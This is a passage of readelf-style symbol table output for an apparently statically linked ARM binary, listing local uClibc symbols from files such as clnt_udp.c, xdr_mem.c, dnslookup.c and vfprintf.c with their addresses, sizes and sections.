  779.   706: 00018994     0 NOTYPE  LOCAL  DEFAULT    2 $d
  780.   707: 0001899c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  781.   708: 000189bc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  782.   709: 000189c4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  783.   710: 000189e0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  784.   711: 000189e8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  785.   712: 00018a88     0 NOTYPE  LOCAL  DEFAULT    2 $d
  786.   713: 00000000     0 FILE    LOCAL  DEFAULT  ABS __syscall_error.c
  787.   714: 00018a98     0 NOTYPE  LOCAL  DEFAULT    2 $a
  788.   715: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/__
  789.   716: 00018ab4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  790.   717: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/vf
  791.   718: 00018ad0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  792.   719: 00018af4     0 NOTYPE  LOCAL  DEFAULT    2 __error
  793.   720: 00000000     0 FILE    LOCAL  DEFAULT  ABS execve.c
  794.   721: 00018b00     0 NOTYPE  LOCAL  DEFAULT    2 $a
  795.   722: 00000000     0 FILE    LOCAL  DEFAULT  ABS getegid.c
  796.   723: 00018b2c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  797.   724: 00000000     0 FILE    LOCAL  DEFAULT  ABS getgid.c
  798.   725: 00018b58     0 NOTYPE  LOCAL  DEFAULT    2 $a
  799.   726: 00000000     0 FILE    LOCAL  DEFAULT  ABS getuid.c
  800.   727: 00018b84     0 NOTYPE  LOCAL  DEFAULT    2 $a
  801.   728: 00000000     0 FILE    LOCAL  DEFAULT  ABS sbrk.c
  802.   729: 00018bb0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  803.   730: 00018c04     0 NOTYPE  LOCAL  DEFAULT    2 $d
  804.   731: 00000000     0 FILE    LOCAL  DEFAULT  ABS _WRITE.c
  805.   732: 00018c08     0 NOTYPE  LOCAL  DEFAULT    2 $a
  806.   733: 00000000     0 FILE    LOCAL  DEFAULT  ABS _fwrite.c
  807.   734: 00018cc4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  808.   735: 00000000     0 FILE    LOCAL  DEFAULT  ABS _trans2w.c
  809.   736: 00018dfc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  810.   737: 00000000     0 FILE    LOCAL  DEFAULT  ABS _uintmaxtostr.c
  811.   738: 00018f00     0 NOTYPE  LOCAL  DEFAULT    2 $a
  812.   739: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/_memcpy.S
  813.   740: 00019050     0 NOTYPE  LOCAL  DEFAULT    2 $a
  814.   741: 00000000     0 FILE    LOCAL  DEFAULT  ABS memchr.c
  815.   742: 000194e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  816.   743: 000195d4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  817.   744: 00000000     0 FILE    LOCAL  DEFAULT  ABS mempcpy.c
  818.   745: 000195dc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  819.   746: 00000000     0 FILE    LOCAL  DEFAULT  ABS memrchr.c
  820.   747: 000195f4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  821.   748: 000196d8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  822.   749: 00000000     0 FILE    LOCAL  DEFAULT  ABS strtok_r.c
  823.   750: 000196e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  824.   751: 00000000     0 FILE    LOCAL  DEFAULT  ABS strpbrk.c
  825.   752: 00019754     0 NOTYPE  LOCAL  DEFAULT    2 $a
  826.   753: 00000000     0 FILE    LOCAL  DEFAULT  ABS clnt_simple.c
  827.   754: 00019794     0 NOTYPE  LOCAL  DEFAULT    2 $a
  828.   755: 00000000     0 FILE    LOCAL  DEFAULT  ABS clnt_udp.c
  829.   756: 00019a38    24 FUNC    LOCAL  DEFAULT    2 clntudp_geterr
  830.   757: 00019a38     0 NOTYPE  LOCAL  DEFAULT    2 $a
  831.   758: 00019a50    40 FUNC    LOCAL  DEFAULT    2 clntudp_freeres
  832.   759: 00019a78     4 FUNC    LOCAL  DEFAULT    2 clntudp_abort
  833.   760: 00019a7c   452 FUNC    LOCAL  DEFAULT    2 clntudp_control
  834.   761: 00019a98     0 NOTYPE  LOCAL  DEFAULT    2 $d
  835.   762: 00019ad4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  836.   763: 00019e9c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  837.   764: 0003187c    24 OBJECT  LOCAL  DEFAULT    9 udp_ops
  838.   765: 00019eac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  839.   766: 00019ef4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  840.   767: 00019ef8    72 FUNC    LOCAL  DEFAULT    2 clntudp_destroy
  841.   768: 00019ef8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  842.   769: 00019f40  1748 FUNC    LOCAL  DEFAULT    2 clntudp_call
  843.   770: 0001a5f8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  844.   771: 0003187c     0 NOTYPE  LOCAL  DEFAULT    9 $d
  845.   772: 00000000     0 FILE    LOCAL  DEFAULT  ABS create_xid.c
  846.   773: 0001a614     0 NOTYPE  LOCAL  DEFAULT    2 $a
  847.   774: 0001a6a8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  848.   775: 00039bbc    24 OBJECT  LOCAL  DEFAULT   10 mylock
  849.   776: 00039bd4     4 OBJECT  LOCAL  DEFAULT   10 is_initialized
  850.   777: 00039bd8    24 OBJECT  LOCAL  DEFAULT   10 __rpc_lrand48_data
  851.   778: 00000000     0 FILE    LOCAL  DEFAULT  ABS pm_getport.c
  852.   779: 0001a6c4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  853.   780: 0001a7f4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  854.   781: 00022e68     8 OBJECT  LOCAL  DEFAULT    4 timeout
  855.   782: 00022e70     8 OBJECT  LOCAL  DEFAULT    4 tottimeout
  856.   783: 00022e68     0 NOTYPE  LOCAL  DEFAULT    4 $d
  857.   784: 00000000     0 FILE    LOCAL  DEFAULT  ABS pmap_prot.c
  858.   785: 0001a808     0 NOTYPE  LOCAL  DEFAULT    2 $a
  859.   786: 00000000     0 FILE    LOCAL  DEFAULT  ABS rpc_commondata.c
  860.   787: 00000000     0 FILE    LOCAL  DEFAULT  ABS rpc_prot.c
  861.   788: 0001a860     0 NOTYPE  LOCAL  DEFAULT    2 $a
  862.   789: 0001a894     0 NOTYPE  LOCAL  DEFAULT    2 $d
  863.   790: 0001a8ac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  864.   791: 0001aadc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  865.   792: 00022e78    24 OBJECT  LOCAL  DEFAULT    4 reply_dscrm
  866.   793: 0001aae0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  867.   794: 00022e78     0 NOTYPE  LOCAL  DEFAULT    4 $d
  868.   795: 00000000     0 FILE    LOCAL  DEFAULT  ABS svc.c
  869.   796: 0001aba4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  870.   797: 0001add8    80 FUNC    LOCAL  DEFAULT    2 svc_find
  871.   798: 0001afc4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  872.   799: 0001afc8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  873.   800: 00000000     0 FILE    LOCAL  DEFAULT  ABS svc_auth.c
  874.   801: 0001b3c4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  875.   802: 0001b42c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  876.   803: 00022e90    12 OBJECT  LOCAL  DEFAULT    4 svcauthsw
  877.   804: 0001b434     8 FUNC    LOCAL  DEFAULT    2 _svcauth_null
  878.   805: 0001b434     0 NOTYPE  LOCAL  DEFAULT    2 $a
  879.   806: 00022e90     0 NOTYPE  LOCAL  DEFAULT    4 $d
  880.   807: 00000000     0 FILE    LOCAL  DEFAULT  ABS svc_authux.c
  881.   808: 0001b43c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  882.   809: 0001b68c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  883.   810: 00000000     0 FILE    LOCAL  DEFAULT  ABS xdr.c
  884.   811: 0001b690     0 NOTYPE  LOCAL  DEFAULT    2 $a
  885.   812: 0001bc38     0 NOTYPE  LOCAL  DEFAULT    2 $d
  886.   813: 00039bf0     4 OBJECT  LOCAL  DEFAULT   10 crud.3275
  887.   814: 00022ef6     4 OBJECT  LOCAL  DEFAULT    4 xdr_zero
  888.   815: 0001bc40     0 NOTYPE  LOCAL  DEFAULT    2 $a
  889.   816: 0001bdd8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  890.   817: 0001bde0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  891.   818: 0001bed8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  892.   819: 0001bee0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  893.   820: 00000000     0 FILE    LOCAL  DEFAULT  ABS xdr_mem.c
  894.   821: 0001bef0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  895.   822: 0001bf0c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  896.   823: 00022efc    40 OBJECT  LOCAL  DEFAULT    4 xdrmem_ops
  897.   824: 0001bf10     4 FUNC    LOCAL  DEFAULT    2 xdrmem_destroy
  898.   825: 0001bf10     0 NOTYPE  LOCAL  DEFAULT    2 $a
  899.   826: 0001bf14    96 FUNC    LOCAL  DEFAULT    2 xdrmem_getlong
  900.   827: 0001bf74    88 FUNC    LOCAL  DEFAULT    2 xdrmem_putlong
  901.   828: 0001bfcc    16 FUNC    LOCAL  DEFAULT    2 xdrmem_getpos
  902.   829: 0001bfdc    52 FUNC    LOCAL  DEFAULT    2 xdrmem_setpos
  903.   830: 0001c010    40 FUNC    LOCAL  DEFAULT    2 xdrmem_inline
  904.   831: 0001c038    96 FUNC    LOCAL  DEFAULT    2 xdrmem_getint32
  905.   832: 0001c098    88 FUNC    LOCAL  DEFAULT    2 xdrmem_putint32
  906.   833: 0001c0f0    64 FUNC    LOCAL  DEFAULT    2 xdrmem_putbytes
  907.   834: 0001c130    72 FUNC    LOCAL  DEFAULT    2 xdrmem_getbytes
  908.   835: 00022efc     0 NOTYPE  LOCAL  DEFAULT    4 $d
  909.   836: 00000000     0 FILE    LOCAL  DEFAULT  ABS inet_aton.c
  910.   837: 0001c178     0 NOTYPE  LOCAL  DEFAULT    2 $a
  911.   838: 0001c260     0 NOTYPE  LOCAL  DEFAULT    2 $d
  912.   839: 00000000     0 FILE    LOCAL  DEFAULT  ABS gethostbyname_r.c
  913.   840: 0001c264     0 NOTYPE  LOCAL  DEFAULT    2 $a
  914.   841: 0001c5bc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  915.   842: 00000000     0 FILE    LOCAL  DEFAULT  ABS realloc.c
  916.   843: 0001c5d8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  917.   844: 0001c6e0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  918.   845: 00000000     0 FILE    LOCAL  DEFAULT  ABS heap_alloc_at.c
  919.   846: 0001c6f0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  920.   847: 00000000     0 FILE    LOCAL  DEFAULT  ABS lrand48_r.c
  921.   848: 0001c77c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  922.   849: 00000000     0 FILE    LOCAL  DEFAULT  ABS nrand48_r.c
  923.   850: 0001c788     0 NOTYPE  LOCAL  DEFAULT    2 $a
  924.   851: 00000000     0 FILE    LOCAL  DEFAULT  ABS srand48_r.c
  925.   852: 0001c7d0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  926.   853: 0001c834     0 NOTYPE  LOCAL  DEFAULT    2 $d
  927.   854: 00000000     0 FILE    LOCAL  DEFAULT  ABS __exit_handler.c
  928.   855: 0001c838     0 NOTYPE  LOCAL  DEFAULT    2 $a
  929.   856: 0001c8c4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  930.   857: 0001c8cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  931.   858: 0001c9a8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  932.   859: 00000000     0 FILE    LOCAL  DEFAULT  ABS dl-support.c
  933.   860: 0001c9d0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  934.   861: 0001c9ec     0 NOTYPE  LOCAL  DEFAULT    2 $d
  935.   862: 00000000     0 FILE    LOCAL  DEFAULT  ABS brk.c
  936.   863: 0001c9f4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  937.   864: 0001ca2c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  938.   865: 00000000     0 FILE    LOCAL  DEFAULT  ABS cmsg_nxthdr.c
  939.   866: 0001ca30     0 NOTYPE  LOCAL  DEFAULT    2 $a
  940.   867: 00000000     0 FILE    LOCAL  DEFAULT  ABS fseeko.c
  941.   868: 0001ca88     0 NOTYPE  LOCAL  DEFAULT    2 $a
  942.   869: 00000000     0 FILE    LOCAL  DEFAULT  ABS printf.c
  943.   870: 0001ca94     0 NOTYPE  LOCAL  DEFAULT    2 $a
  944.   871: 0001cacc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  945.   872: 00000000     0 FILE    LOCAL  DEFAULT  ABS fseeko64.c
  946.   873: 0001cad0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  947.   874: 0001cbf0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  948.   875: 00000000     0 FILE    LOCAL  DEFAULT  ABS _adjust_pos.c
  949.   876: 0001cc00     0 NOTYPE  LOCAL  DEFAULT    2 $a
  950.   877: 00000000     0 FILE    LOCAL  DEFAULT  ABS _cs_funcs.c
  951.   878: 0001cccc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  952.   879: 00000000     0 FILE    LOCAL  DEFAULT  ABS vfprintf.c
  953.   880: 0001ccfc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  954.   881: 0001cda8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  955.   882: 00000000     0 FILE    LOCAL  DEFAULT  ABS _vfprintf_internal.c
  956.   883: 0001cdb8    76 FUNC    LOCAL  DEFAULT    2 _charpad
  957.   884: 0001cdb8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  958.   885: 0001ce04   132 FUNC    LOCAL  DEFAULT    2 _fp_out_narrow
  959.   886: 0001d468     0 NOTYPE  LOCAL  DEFAULT    2 $d
  960.   887: 00022f40     7 OBJECT  LOCAL  DEFAULT    4 spec_base.4140
  961.   888: 00022f34    12 OBJECT  LOCAL  DEFAULT    4 prefix.4141
  962.   889: 00000000     0 FILE    LOCAL  DEFAULT  ABS _ppfs_init.c
  963.   890: 0001d47c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  964.   891: 00000000     0 FILE    LOCAL  DEFAULT  ABS _ppfs_prepargs.c
  965.   892: 0001d514     0 NOTYPE  LOCAL  DEFAULT    2 $a
  966.   893: 00000000     0 FILE    LOCAL  DEFAULT  ABS _ppfs_setargs.c
  967.   894: 0001d54c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  968.   895: 0001d6e4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  969.   896: 00000000     0 FILE    LOCAL  DEFAULT  ABS _ppfs_parsespec.c
  970.   897: 0001d6e8    76 FUNC    LOCAL  DEFAULT    2 _promoted_size
  971.   898: 0001d6e8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  972.   899: 0001d728     0 NOTYPE  LOCAL  DEFAULT    2 $d
  973.   900: 00022fa8    24 OBJECT  LOCAL  DEFAULT    4 type_codes
  974.   901: 00022fc0    12 OBJECT  LOCAL  DEFAULT    4 type_sizes
  975.   902: 0001d734     0 NOTYPE  LOCAL  DEFAULT    2 $a
  976.   903: 0001dbd4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  977.   904: 00022fa0     8 OBJECT  LOCAL  DEFAULT    4 spec_flags.4142
  978.   905: 00022f48    20 OBJECT  LOCAL  DEFAULT    4 qual_chars.4147
  979.   906: 00022f88    21 OBJECT  LOCAL  DEFAULT    4 spec_chars.4143
  980.   907: 00022f7c     9 OBJECT  LOCAL  DEFAULT    4 spec_ranges.4144
  981.   908: 00022f6c    16 OBJECT  LOCAL  DEFAULT    4 spec_or_mask.4145
  982.   909: 00022f5c    16 OBJECT  LOCAL  DEFAULT    4 spec_and_mask.4146
  983.   910: 00000000     0 FILE    LOCAL  DEFAULT  ABS fputs.c
  984.   911: 0001dbf8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  985.   912: 0001dc74     0 NOTYPE  LOCAL  DEFAULT    2 $d
  986.   913: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/memcmp.S
  987.   914: 0001dc90     0 NOTYPE  LOCAL  DEFAULT    2 $a
  988.   915: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/string/arm/memmove.S
  989.   916: 0001dcc0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  990.   917: 00000000     0 FILE    LOCAL  DEFAULT  ABS rawmemchr.c
  991.   918: 0001dcd0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  992.   919: 0001dd80     0 NOTYPE  LOCAL  DEFAULT    2 $d
  993.   920: 00000000     0 FILE    LOCAL  DEFAULT  ABS strncpy.c
  994.   921: 0001dd88     0 NOTYPE  LOCAL  DEFAULT    2 $a
  995.   922: 00000000     0 FILE    LOCAL  DEFAULT  ABS strnlen.c
  996.   923: 0001de40     0 NOTYPE  LOCAL  DEFAULT    2 $a
  997.   924: 0001df18     0 NOTYPE  LOCAL  DEFAULT    2 $d
  998.   925: 00000000     0 FILE    LOCAL  DEFAULT  ABS strspn.c
  999.   926: 0001df20     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1000.   927: 00000000     0 FILE    LOCAL  DEFAULT  ABS __glibc_strerror_r.c
  1001.   928: 0001df70     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1002.   929: 00000000     0 FILE    LOCAL  DEFAULT  ABS __xpg_strerror_r.c
  1003.   930: 0001df84     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1004.   931: 0001e064     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1005.   932: 00022fcc    14 OBJECT  LOCAL  DEFAULT    4 unknown.1088
  1006.   933: 00000000     0 FILE    LOCAL  DEFAULT  ABS _string_syserrmsgs.c
  1007.   934: 00000000     0 FILE    LOCAL  DEFAULT  ABS ffs.c
  1008.   935: 0001e06c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1009.   936: 00000000     0 FILE    LOCAL  DEFAULT  ABS auth_none.c
  1010.   937: 0001e0c8     4 FUNC    LOCAL  DEFAULT    2 authnone_verf
  1011.   938: 0001e0c8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1012.   939: 0001e0cc     8 FUNC    LOCAL  DEFAULT    2 authnone_validate
  1013.   940: 0001e0d4     8 FUNC    LOCAL  DEFAULT    2 authnone_refresh
  1014.   941: 0001e0dc     4 FUNC    LOCAL  DEFAULT    2 authnone_destroy
  1015.   942: 0001e0e0    64 FUNC    LOCAL  DEFAULT    2 authnone_marshal
  1016.   943: 0001e1e4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1017.   944: 00023b38    20 OBJECT  LOCAL  DEFAULT    4 ops
  1018.   945: 00023b38     0 NOTYPE  LOCAL  DEFAULT    4 $d
  1019.   946: 00000000     0 FILE    LOCAL  DEFAULT  ABS authunix_prot.c
  1020.   947: 0001e1ec     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1021.   948: 0001e284     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1022.   949: 00000000     0 FILE    LOCAL  DEFAULT  ABS bindresvport.c
  1023.   950: 0001e288     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1024.   951: 0001e3dc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1025.   952: 00039c04     2 OBJECT  LOCAL  DEFAULT   10 port.2274
  1026.   953: 00000000     0 FILE    LOCAL  DEFAULT  ABS pmap_clnt.c
  1027.   954: 0001e3e4   360 FUNC    LOCAL  DEFAULT    2 __get_myaddress
  1028.   955: 0001e3e4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1029.   956: 0001e538     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1030.   957: 0001e54c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1031.   958: 0001e624     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1032.   959: 00023bcc     8 OBJECT  LOCAL  DEFAULT    4 timeout
  1033.   960: 00023bd4     8 OBJECT  LOCAL  DEFAULT    4 tottimeout
  1034.   961: 0001e638     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1035.   962: 0001e734     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1036.   963: 00023bcc     0 NOTYPE  LOCAL  DEFAULT    4 $d
  1037.   964: 00000000     0 FILE    LOCAL  DEFAULT  ABS rpc_dtablesize.c
  1038.   965: 0001e74c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1039.   966: 0001e770     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1040.   967: 00039c08     4 OBJECT  LOCAL  DEFAULT   10 size.3839
  1041.   968: 00000000     0 FILE    LOCAL  DEFAULT  ABS xdr_array.c
  1042.   969: 0001e774     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1043.   970: 0001e8fc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1044.   971: 00000000     0 FILE    LOCAL  DEFAULT  ABS dnslookup.c
  1045.   972: 0001e904     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1046.   973: 0001f0dc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1047.   974: 00039c0c    24 OBJECT  LOCAL  DEFAULT   10 mylock
  1048.   975: 00039c24     4 OBJECT  LOCAL  DEFAULT   10 static_ns
  1049.   976: 00031894     2 OBJECT  LOCAL  DEFAULT    9 static_id
  1050.   977: 00000000     0 FILE    LOCAL  DEFAULT  ABS opennameservers.c
  1051.   978: 0001f110     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1052.   979: 0001f3a4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1053.   980: 00031898     0 NOTYPE  LOCAL  DEFAULT    9 $d
  1054.   981: 00000000     0 FILE    LOCAL  DEFAULT  ABS get_hosts_byname_r.c
  1055.   982: 0001f3e4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1056.   983: 00000000     0 FILE    LOCAL  DEFAULT  ABS bind.c
  1057.   984: 0001f42c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1058.   985: 00000000     0 FILE    LOCAL  DEFAULT  ABS drand48-iter.c
  1059.   986: 0001f458     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1060.   987: 0001f550     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1061.   988: 00000000     0 FILE    LOCAL  DEFAULT  ABS __h_errno_location.c
  1062.   989: 0001f554     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1063.   990: 0001f55c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1064.   991: 00000000     0 FILE    LOCAL  DEFAULT  ABS wcrtomb.c
  1065.   992: 0001f560     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1066.   993: 00000000     0 FILE    LOCAL  DEFAULT  ABS wcsrtombs.c
  1067.   994: 0001f5b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1068.   995: 00000000     0 FILE    LOCAL  DEFAULT  ABS wcsnrtombs.c
  1069.   996: 0001f5d0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1070.   997: 00000000     0 FILE    LOCAL  DEFAULT  ABS fclose.c
  1071.   998: 0001f68c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1072.   999: 0001f7f0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1073.  1000: 00000000     0 FILE    LOCAL  DEFAULT  ABS fopen.c
  1074.  1001: 0001f80c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1075.  1002: 00000000     0 FILE    LOCAL  DEFAULT  ABS perror.c
  1076.  1003: 0001f818     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1077.  1004: 0001f850     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1078.  1005: 00000000     0 FILE    LOCAL  DEFAULT  ABS fprintf.c
  1079.  1006: 0001f860     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1080.  1007: 00000000     0 FILE    LOCAL  DEFAULT  ABS _fopen.c
  1081.  1008: 0001f890     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1082.  1009: 0001fb58     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1083.  1010: 00000000     0 FILE    LOCAL  DEFAULT  ABS _load_inttype.c
  1084.  1011: 0001fb88     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1085.  1012: 00000000     0 FILE    LOCAL  DEFAULT  ABS _store_inttype.c
  1086.  1013: 0001fbf8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1087.  1014: 00000000     0 FILE    LOCAL  DEFAULT  ABS _fpmaxtostr.c
  1088.  1015: 0001fc2c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1089.  1016: 00020014     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1090.  1017: 00023c54    20 OBJECT  LOCAL  DEFAULT    4 fmt
  1091.  1018: 00023c68    72 OBJECT  LOCAL  DEFAULT    4 exp10_table
  1092.  1019: 0002004c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1093.  1020: 00023c68     0 NOTYPE  LOCAL  DEFAULT    4 $d
  1094.  1021: 00000000     0 FILE    LOCAL  DEFAULT  ABS fgets.c
  1095.  1022: 00020294     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1096.  1023: 00020318     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1097.  1024: 00000000     0 FILE    LOCAL  DEFAULT  ABS fflush_unlocked.c
  1098.  1025: 00020328     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1099.  1026: 00020440     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1100.  1027: 00020468     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1101.  1028: 00020628     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1102.  1029: 00000000     0 FILE    LOCAL  DEFAULT  ABS fgets_unlocked.c
  1103.  1030: 0002064c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1104.  1031: 00000000     0 FILE    LOCAL  DEFAULT  ABS strncat.c
  1105.  1032: 000206e4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1106.  1033: 00000000     0 FILE    LOCAL  DEFAULT  ABS strdup.c
  1107.  1034: 000207ac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1108.  1035: 00000000     0 FILE    LOCAL  DEFAULT  ABS clnt_perror.c
  1109.  1036: 000207dc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1110.  1037: 0002081c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1111.  1038: 00023ef0   451 OBJECT  LOCAL  DEFAULT    4 rpc_errstr
  1112.  1039: 00023e60   144 OBJECT  LOCAL  DEFAULT    4 rpc_errlist
  1113.  1040: 00020828    20 FUNC    LOCAL  DEFAULT    2 free_mem
  1114.  1041: 00020828     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1115.  1042: 00020854     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1116.  1043: 00020858    44 FUNC    LOCAL  DEFAULT    2 _buf
  1117.  1044: 00020858     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1118.  1045: 0002097c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1119.  1046: 00020984     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1120.  1047: 0002099c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1121.  1048: 000209a0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1122.  1049: 00020a18     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1123.  1050: 00020a60     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1124.  1051: 00020b60     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1125.  1052: 00023d98   198 OBJECT  LOCAL  DEFAULT    4 auth_errstr
  1126.  1053: 00023d58    64 OBJECT  LOCAL  DEFAULT    4 auth_errlist
  1127.  1054: 00020b80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1128.  1055: 00020b98     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1129.  1056: 00023d58     0 NOTYPE  LOCAL  DEFAULT    4 $d
  1130.  1057: 00000000     0 FILE    LOCAL  DEFAULT  ABS ntop.c
  1131.  1058: 00020b9c   204 FUNC    LOCAL  DEFAULT    2 inet_pton4
  1132.  1059: 00020b9c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1133.  1060: 00020e74     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1134.  1061: 000240c8    17 OBJECT  LOCAL  DEFAULT    4 xdigits.3041
  1135.  1062: 00020e78   356 FUNC    LOCAL  DEFAULT    2 inet_ntop4
  1136.  1063: 00020e78     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1137.  1064: 00020fd8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1138.  1065: 00020fdc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  1139.  1066: 00021234     0 NOTYPE  LOCAL  DEFAULT    2 $d
  1140.  1067: 00000000     0 FILE    LOCAL  DEFAULT  ABS encodeh.c
